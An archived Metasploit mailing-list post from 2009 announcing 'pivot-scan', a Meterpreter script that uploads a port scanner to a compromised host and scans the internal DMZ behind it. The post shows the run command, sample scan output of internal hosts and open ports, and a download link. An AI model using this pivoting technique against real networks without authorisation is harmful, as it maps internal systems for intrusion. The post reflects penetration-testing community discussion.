Metasploit mailing list archives
Pivot-scan
From: aepereyra at gmail.com (Augusto Pereyra)
Date: Fri, 27 Mar 2009 16:30:11 -0300
Hi list: This little meterpreter tool writed in ruby called pivot-scan facilitates process for enumeration of host in a dmz autodetecting LAN, uploading and using a port scanner. When you have a meterpreter session of a host you run it in the following way: meterpreter > run pivot-scan -a [*] Created by Augusto Pereyra aepereyra at gmail.com [*] Uploading Portscanner [*] Performing portscanning for IP range 192.168.1.1-192.168.1.254 [*] Transmitting intermediate stager for over-sized stage...(191 bytes) 192.168.1.3,"",0,0,"Yes","139 445 12345","123 137 138 445 500" 192.168.1.10,"",0,0,"Yes","7 9 13 19 135 139 445 12345","7 9 137 138 161 445 500 1027" 192.168.1.9,"",0,0,"Yes","135 139 445 1433 8080 12345","137 138 445 500 1434" 192.168.1.14,"",0,0,"Yes","7 9 13 19 135 139 1433","7 9 137 138 500 1434" 192.168.1.16,"",0,0,"Yes","7 9 13 19 135 139 445 12345","7 9 137 138 161 445 500 1027" 192.168.1.18,"",0,0,"Yes","21 23 25 80 515","69 137 138 161" 192.168.1.23,"",0,0,"Yes","135 139 445 1025 1755 3372 6666","135 137 138 445 500 1027" 192.168.1.178,"",546,0,"Yes"," 443","7 9 11 53 68 69 111 123 135 137 161 191 192 256 260 407 445 500 514 520 1009 1024 1025 1027 1028 1030 1033 1034 1035 1037 1041 1058 1060 1434 1645 1646 1812 1813 1900 1978 2002 2049 2140 2161 2301 2365 2493 2631 2967 3179 3327 3456 4045 4156 4296 4802 5631 5632 11487 31337 32768 32769 32770 32771 32772 32773 32774 32775 32777 32778 32779 32780 32781 32782 32783 32784 32785 32786 32787 32788 32789 32790" 192.168.1.201,"",0,2,"Yes","","53 67 68 69 123 137 138 161 514 520 1812" 192.168.1.210,"",0,0,"Yes","","68 161 1025" meterpreter > As you can see all hosts in the dmz were scanned by the controlled host and it is possible because they are all in the same LAN. These hosts listed in the above example are unreachables from internet but not from the host used to do the portscan. You can download this tool from the following link: http://code.google.com/p/pivot-scan/downloads/list Thank you Best regard Augusto Pereyra
Current thread:
- Pivot-scan Augusto Pereyra (Mar 27)
- Pivot-scan MaXe (Mar 28)
- Pivot-scan Augusto Pereyra (Mar 28)
- Pivot-scan MaXe (Mar 28)